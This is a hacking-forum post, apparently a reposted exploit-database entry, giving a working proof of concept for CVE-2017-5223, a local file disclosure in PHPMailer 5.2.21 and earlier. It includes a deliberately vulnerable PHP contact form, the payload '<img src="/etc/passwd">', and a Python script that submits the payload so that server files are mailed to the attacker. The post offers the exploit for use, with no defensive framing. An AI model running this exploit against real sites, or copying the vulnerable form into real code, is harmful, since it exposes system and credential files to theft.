PHPMailer 5.2.21 Local File Disclosure

Discussion in 'Hacking Tools & Programs' started by Ravager, Nov 17, 2017.

  1. Ravager

    Ravager New Member

    Joined:
    Nov 14, 2017
    Messages:
    4
    HTML:
    # Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
    # Date: 2017-10-25
    # Exploit Author: Maciek Krupa
    # All credit only to Yongxiang Li of Asiasecurity
    # Software Link: https://github.com/PHPMailer/PHPMailer
    # Version: 5.2.21
    # Tested on: Linux Debian 9
    # CVE : CVE-2017-5223
    
    // PoC //
    
    It requires a contact form that sends HTML emails and allows to send a copy to your e-mail
    
    // vulnerable form example //
    
    <?php
    require_once('class.phpmailer.php'); // PHPMailer <= 5.2.21
    if (isset($_POST['your-name'], $_POST['your-email'], $_POST['your-message'])) {
    $mail = new PHPMailer();
    $mail->SetFrom($_POST["your-email"], $_POST["your-name"]);
    $address = "admin@localhost";
    $mail->AddAddress($address, "root");
    if (isset($_POST['cc'])) $mail->AddCC($_POST["your-email"], $_POST["your-name"]);
    $mail->Subject = "PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)";
    $mail->MsgHTML($_POST["your-message"]);
    if(!$mail->Send()) echo "Error: ".$mail->ErrorInfo; else echo "Sent!";
    }
    ?>
    <form action="/contact.php" method="post">
    <p><label>Your Name<br /><input type="text" name="your-name" value="" size="40" /></span> </label></p>
    <p><label>Your Email<br /><input type="email" name="your-email" value="" size="40" /></span> </label></p>
    <p><label>Your Message<br /><textarea name="your-message" cols="40" rows="10"></textarea></label></p>
    <p><input type="checkbox" name="cc" value="yes" /><span>Send me a copy of this message</span>
    <p><input type="submit" value="submit" /></p>
    
    // exploit //
    
    Put <img src="/etc/passwd"> in the message (or other file to disclose).
    
    // python code //
    
    #!/usr/bin/python
    import urllib
    import urllib2
    
    poc = """
    # Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
    # Date: 2017-10-25
    # Exploit Author: Maciek Krupa
    # All credit only to Yongxiang Li of Asiasecurity
    # Software Link: https://github.com/PHPMailer/PHPMailer
    # Version: 5.2.21
    # Tested on: Linux Debian 9
    # CVE : CVE-2017-5223
    """
    
    url = 'http://localhost/contact.php'
    email = 'attacker@localhost'
    payload = '<img src="/etc/passwd"'
    values = {'action': 'send', 'your-name': 'Attacker', 'your-email': email, 'cc': 'yes', 'your-message': payload}
    data = urllib.urlencode(values)
    req = urllib2.Request(url, data)
    response = urllib2.urlopen(req)
    html = response.read()
    print html
    
     

Share This Page